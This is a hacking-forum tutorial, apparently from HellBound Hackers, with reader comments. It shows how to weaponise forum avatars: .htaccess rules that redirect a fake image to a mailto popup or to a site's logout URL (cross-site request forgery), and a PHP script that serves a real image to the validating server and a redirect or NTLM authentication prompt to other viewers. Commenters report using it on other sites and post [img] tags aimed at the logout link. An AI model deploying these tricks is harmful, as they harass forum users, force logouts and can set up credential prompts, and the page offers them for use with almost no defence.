Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

How to make popup and logout avatars


How to make popup and logout avatars

By ghostghost | 4924 Reads |
0     0

– How to make a popup avatar

Create a new folder at your site, create a .htaccess file:

Errordocument 404 mail to:tosk
ForceType application/x-httpd-php

It's supposed to be mail to in ONE word, the word is blocked.

Then go to http://yoursite.com/yourdirectory/foobar.jpg, and you will receive a mailto: popup. Very annoying. Set it as your avatar in any forum, and I'll make a popup appear on the forum itself.

– How to make a logout avatar

Let's say, you want one for this site, then just edit your .htaccess file:

Errordocument 404 http://hellboundhackers.org/news.php?logout=yes
ForceType application/x-httpd-php

Then use the same url http://yoursite.com/yourdirectory/foobar.jpg, which will cause a 404 and forward the viewer to the logout link.

– How to make a popup avatar when the victim server uses fsockopen to only allow valid images

<?php
$ip=$_SERVER['REMOTE_ADDR'];
if($ip=="$server_ip_here")
{
header("Content-type: image/jpg");
$img_handle = imagecreatefrompng("realimage.png");

ImagePng ($img_handle);
imagedestroy($img_handle);
}
else
{
//header("Location: mailto:lol");

/*
header('WWW-Authenticate: Negotiate');
header('WWW-Authenticate: NTLM', false);
*/

}
?>

EDIT: I have no idea how to protect your forum from this, you can of course secure the logout link with keys, but as far as I know, the popup shit is unstoppable. <h1>mofo</h1>

Comments
ghost's avatar
ghost 17 years ago

thats beautiful we can use it to get more traffic on HBH :-P

richohealey's avatar
richohealey 17 years ago

that's cool, but could be incredibly annoying. you should include how to stop comeone else doing that to you!

otherwise a very nice article

Flaming_figures's avatar
Flaming_figures 17 years ago

One question- who is going to test this on critical or something?

ghost's avatar
ghost 17 years ago

we can use it to get more traffic on HBH -Intrus- thats bad shit if you start doing that on sites. Mr_Cheese doesnt want fucked over by that shit im sure

ghost's avatar
ghost 17 years ago

It works on criticalsecurity.net, haven't tried it here, but it should work

ghost's avatar
ghost 17 years ago

logout image –> [img]http://hellboundhackers.org/news.php?logout=yes[/img]

ghost's avatar
ghost 17 years ago

beetleflux -> Nice try but it dont work … i'm not logout

ghost's avatar
ghost 17 years ago

This would work for Chatzilla user …

[img]http://phpbot.ph.funpic.org/NoImg/img.php[/img]